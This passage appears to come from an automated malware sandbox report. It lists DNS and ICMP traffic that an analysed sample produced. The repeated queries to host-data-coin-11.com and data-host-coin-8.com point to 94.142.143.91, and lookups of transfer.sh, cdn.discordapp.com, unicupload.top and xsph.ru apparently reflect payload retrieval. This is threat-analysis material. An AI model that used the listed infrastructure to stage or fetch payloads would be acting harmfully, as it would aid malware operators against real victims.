                                                                                                                                                                                                    Jan 14, 2022 04:59:05.857112885 CET53565278.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.903516054 CET4955953192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.924907923 CET53495598.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.080219984 CET6329753192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.419181108 CET53632978.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.586293936 CET5836153192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.605556011 CET53583618.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.756551981 CET5361553192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.777210951 CET53536158.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.931622028 CET5072853192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:07.219146013 CET53507288.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.417393923 CET6098253192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.436482906 CET53609828.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.583241940 CET5805853192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.602279902 CET53580588.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.807693005 CET5153953192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.827039957 CET53515398.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.978353024 CET5539353192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.997534037 CET53553938.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.136306047 CET6345653192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.155534029 CET53634568.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.308692932 CET5854053192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.328099966 CET53585408.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.480348110 CET5510853192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.499604940 CET53551088.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.673835993 CET6443253192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.696434975 CET53644328.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:15.852540970 CET4925053192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:15.869771957 CET53492508.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:16.019736052 CET6349053192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:16.038958073 CET53634908.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:16.194268942 CET6511053192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:16.211462021 CET53651108.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.402025938 CET5670653192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.419707060 CET53567068.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.569633961 CET5356953192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.588934898 CET53535698.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.741621017 CET6285553192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.763266087 CET53628558.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.911159039 CET5104653192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.928505898 CET53510468.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.119282007 CET6550153192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.136437893 CET53655018.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.310786009 CET5346553192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.649342060 CET53534658.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.826169968 CET4929053192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.845807076 CET53492908.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.012763023 CET5975453192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.032780886 CET53597548.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.222218990 CET4923453192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.241664886 CET53492348.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.409629107 CET5872053192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.427237034 CET53587208.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.579499006 CET5744753192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.598696947 CET53574478.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.776551008 CET6358353192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.795768023 CET53635838.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.972970009 CET6409953192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.992176056 CET53640998.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:40.140419006 CET6461053192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:40.159840107 CET53646108.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:41.762509108 CET5198953192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:41.781734943 CET53519898.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:41.929316998 CET5315253192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:41.948843002 CET53531528.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.097152948 CET6159053192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.118859053 CET53615908.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.619268894 CET5607753192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.638514042 CET53560778.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.788170099 CET5795153192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.807667017 CET53579518.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.007805109 CET5327653192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.027211905 CET53532768.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.185044050 CET6013553192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.204377890 CET53601358.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.508315086 CET4984953192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.525659084 CET53498498.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.717730045 CET6025353192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.737229109 CET53602538.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.931668043 CET5870653192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:44.219611883 CET53587068.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.271538019 CET6267753192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.291184902 CET53626778.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.470891953 CET6259553192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.490119934 CET53625958.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.680732965 CET5118953192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.702827930 CET53511898.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:47.018752098 CET4996753192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:47.036506891 CET53499678.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:47.208081961 CET5145453192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:47.227461100 CET53514548.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:47.393491983 CET5716353192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:47.410892963 CET53571638.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.497632027 CET5636053192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.517072916 CET53563608.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.683773041 CET4925853192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.702513933 CET53492588.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.875883102 CET5619553192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.894743919 CET53561958.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:51.042114019 CET5302153192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:51.061510086 CET53530218.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:51.220155954 CET5261853192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:51.239556074 CET53526188.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:54.191374063 CET6438353192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:54.210815907 CET53643838.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:54.357472897 CET5034653192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:54.374965906 CET53503468.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:54.527290106 CET5028153192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:54.852350950 CET53502818.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:56.675244093 CET5632853192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:56.692734957 CET53563288.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:56.848815918 CET5692153192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:56.868699074 CET53569218.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:57.050348997 CET5952953192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:57.069597006 CET53595298.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:58.553850889 CET6485353192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:58.570993900 CET53648538.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:58.746254921 CET5631753192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:58.765391111 CET53563178.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:59.226322889 CET5157053192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:59.245784998 CET53515708.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:59.460711956 CET5366353192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:59.480294943 CET53536638.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:59.640183926 CET6007053192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:59.659004927 CET53600708.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:59.863010883 CET5875053192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:59.880700111 CET53587508.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 05:00:00.027681112 CET6072753192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 05:00:00.046947002 CET53607278.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 05:00:04.050385952 CET6375353192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 05:00:04.069551945 CET53637538.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 05:00:12.784190893 CET5231253192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 05:00:12.806410074 CET53523128.8.8.8192.168.2.3

                                                                                                                                                                                                    ICMP Packets

                                                                                                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                    Jan 14, 2022 04:59:16.383752108 CET188.166.28.199192.168.2.39935(Unknown)Destination Unreachable
                                                                                                                                                                                                    Jan 14, 2022 04:59:19.384167910 CET188.166.28.199192.168.2.39935(Unknown)Destination Unreachable
                                                                                                                                                                                                    Jan 14, 2022 04:59:25.384391069 CET188.166.28.199192.168.2.39935(Unknown)Destination Unreachable

                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                    Jan 14, 2022 04:58:57.936820030 CET192.168.2.38.8.8.80xbd88Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.421669006 CET192.168.2.38.8.8.80x1002Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.599421024 CET192.168.2.38.8.8.80x60cfStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.036449909 CET192.168.2.38.8.8.80x7c36Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.492367029 CET192.168.2.38.8.8.80xeae6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.987896919 CET192.168.2.38.8.8.80xc5a0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.657037973 CET192.168.2.38.8.8.80x5aa8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.822875977 CET192.168.2.38.8.8.80xb998Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.000912905 CET192.168.2.38.8.8.80x7937Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.080883026 CET192.168.2.38.8.8.80xa003Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.270278931 CET192.168.2.38.8.8.80x7652Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.438930035 CET192.168.2.38.8.8.80x93e2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.772653103 CET192.168.2.38.8.8.80x3dc9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.322487116 CET192.168.2.38.8.8.80x4db7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.836077929 CET192.168.2.38.8.8.80x9fe1Standard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.903516054 CET192.168.2.38.8.8.80x5e60Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.080219984 CET192.168.2.38.8.8.80x19efStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.586293936 CET192.168.2.38.8.8.80x9734Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.756551981 CET192.168.2.38.8.8.80x4516Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.931622028 CET192.168.2.38.8.8.80x6f90Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.417393923 CET192.168.2.38.8.8.80x1054Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.583241940 CET192.168.2.38.8.8.80xfd6dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.807693005 CET192.168.2.38.8.8.80x2b7fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.978353024 CET192.168.2.38.8.8.80xa8c6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.136306047 CET192.168.2.38.8.8.80xe5e9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.308692932 CET192.168.2.38.8.8.80xa452Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.480348110 CET192.168.2.38.8.8.80xb6cfStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.673835993 CET192.168.2.38.8.8.80xe8b0Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:15.852540970 CET192.168.2.38.8.8.80x57eeStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:16.019736052 CET192.168.2.38.8.8.80x2449Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:16.194268942 CET192.168.2.38.8.8.80x90d1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.402025938 CET192.168.2.38.8.8.80x31e3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.569633961 CET192.168.2.38.8.8.80x5d04Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.741621017 CET192.168.2.38.8.8.80xa153Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:37.911159039 CET192.168.2.38.8.8.80x3a0dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.119282007 CET192.168.2.38.8.8.80x2ad0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.310786009 CET192.168.2.38.8.8.80x4cfcStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:38.826169968 CET192.168.2.38.8.8.80xbd9cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.012763023 CET192.168.2.38.8.8.80x6eb0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.222218990 CET192.168.2.38.8.8.80x8dbcStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.409629107 CET192.168.2.38.8.8.80x5518Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.579499006 CET192.168.2.38.8.8.80x6941Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.776551008 CET192.168.2.38.8.8.80x7b12Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.972970009 CET192.168.2.38.8.8.80xbaa6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:40.140419006 CET192.168.2.38.8.8.80xeab0Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:41.762509108 CET192.168.2.38.8.8.80x2fb9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:41.929316998 CET192.168.2.38.8.8.80x31c7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.097152948 CET192.168.2.38.8.8.80x2946Standard query (0)goo.suA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.619268894 CET192.168.2.38.8.8.80x5a61Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.788170099 CET192.168.2.38.8.8.80x7801Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.007805109 CET192.168.2.38.8.8.80x4677Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.185044050 CET192.168.2.38.8.8.80x588cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.508315086 CET192.168.2.38.8.8.80x1aefStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.717730045 CET192.168.2.38.8.8.80xad97Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.931668043 CET192.168.2.38.8.8.80x2957Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.271538019 CET192.168.2.38.8.8.80xd604Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.470891953 CET192.168.2.38.8.8.80x3e52Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:46.680732965 CET192.168.2.38.8.8.80xe48bStandard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:47.018752098 CET192.168.2.38.8.8.80xd2dfStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:47.208081961 CET192.168.2.38.8.8.80xf415Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:47.393491983 CET192.168.2.38.8.8.80xa9e5Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.497632027 CET192.168.2.38.8.8.80x7758Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.683773041 CET192.168.2.38.8.8.80x8e87Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.875883102 CET192.168.2.38.8.8.80x2accStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:51.042114019 CET192.168.2.38.8.8.80xdd66Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:51.220155954 CET192.168.2.38.8.8.80x307eStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:54.191374063 CET192.168.2.38.8.8.80x3fcdStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:54.357472897 CET192.168.2.38.8.8.80x3a36Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:54.527290106 CET192.168.2.38.8.8.80x81dStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:56.675244093 CET192.168.2.38.8.8.80x762bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:56.848815918 CET192.168.2.38.8.8.80xe43cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:57.050348997 CET192.168.2.38.8.8.80x5ec5Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:58.553850889 CET192.168.2.38.8.8.80x3149Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:58.746254921 CET192.168.2.38.8.8.80x5336Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:59.226322889 CET192.168.2.38.8.8.80x8753Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:59.460711956 CET192.168.2.38.8.8.80x71e1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:59.640183926 CET192.168.2.38.8.8.80xad75Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:59.863010883 CET192.168.2.38.8.8.80x7f0fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 05:00:00.027681112 CET192.168.2.38.8.8.80x7d46Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 05:00:04.050385952 CET192.168.2.38.8.8.80xca23Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 05:00:12.784190893 CET192.168.2.38.8.8.80xc7e2Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.250190973 CET8.8.8.8192.168.2.30xbd88No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.442079067 CET8.8.8.8192.168.2.30x1002No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.886639118 CET8.8.8.8192.168.2.30x60cfNo error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.337162971 CET8.8.8.8192.168.2.30x7c36No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.808490038 CET8.8.8.8192.168.2.30xeae6No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.296633005 CET8.8.8.8192.168.2.30xc5a0No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.674735069 CET8.8.8.8192.168.2.30x5aa8No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.842137098 CET8.8.8.8192.168.2.30xb998No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.288902044 CET8.8.8.8192.168.2.30x7937No error (0)data-host-coin-8.com94.142.143.91A (IP address)IN (0x0001)
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.100373983 CET8.8.8.8192.168.2.30xa003No error (0)host-data-coin-11.com94.142.143.91A (IP address)IN (0x0001)
